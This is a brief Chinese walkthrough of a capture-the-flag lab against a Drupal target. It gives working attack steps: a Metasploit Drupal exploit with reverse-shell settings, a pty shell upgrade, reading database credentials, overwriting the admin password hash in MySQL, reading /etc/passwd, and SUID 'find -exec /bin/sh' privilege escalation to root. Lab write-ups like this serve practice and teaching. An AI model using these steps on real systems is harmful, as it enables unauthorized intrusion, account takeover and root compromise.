信息收集
ip端口扫描
访问开启http 80端口
用kali自带的msf进行漏洞利用
查看drupal漏洞模块
使用模块1,配置kali ip(lhost)和靶机ip(rhost),配置好后运行
使用shell进入桌面, python -c 'import pty;pty.spawn("/bin/bash") 输入命令显示路径
找到flag1.txt
使用find命令查找配置文件,打开文件,发现flag2.txt
查看flag2.txt文件,发现mysql账号密码
登陆mysql
连接正常,采取重置用户密码 的操作,查询资料了解到一般drupal对数据库的加密方法是把加密脚本放在网站根目录下scripts文件下,退出mysql,使用drupal自带脚本重新生成密码
得到新密码的hash值之后对密码就可以进行修改密码的操作了,重新连接mysql数据库
update drupaldb.users set pass="$S$DZd1Uys/pTTUMeYxp/1itfVmFjcyvwol92Uw6qHT57M.geEQTujQ" where uid=1;
登陆网页 admin \ 123456
在content下发现flag3
查看flag3.txt
cat /etc/passwd下发现flag4用户
去家目录下查看flag4
查找root下的flag
find /perm -u=s -type f 2>/dev/null find / -perm -4000
发现find本身就是root权限的命令,此时也发现了它的路径:/usr/bin/find
使用find命令提权
ls -lh /usr/bin/find
find ./ aaa -exec '/bin/sh' \;
查看flag5.txt